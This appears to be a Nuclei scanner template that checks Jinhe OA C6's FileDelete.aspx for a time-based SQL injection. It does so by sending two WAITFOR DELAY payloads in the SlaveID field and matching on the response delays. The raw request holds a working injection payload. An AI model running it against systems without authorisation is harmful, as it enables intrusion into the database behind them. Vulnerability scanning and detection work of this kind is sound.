id: jinheOA-C6-FileDelete_aspx-sql-time

info:
  name: 金和OA C6 FileDelete.aspx SQL延时注入漏洞
  author: jinheOA
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        POST /c6/Jhsoft.Web.accept/FileDelete.aspx/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SlaveID=1')WAITFOR/**/DELAY'0:0:4'--/Temp/
      - |
        POST /c6/Jhsoft.Web.accept/FileDelete.aspx/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SlaveID=1')WAITFOR/**/DELAY'0:0:8'--/Temp/
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and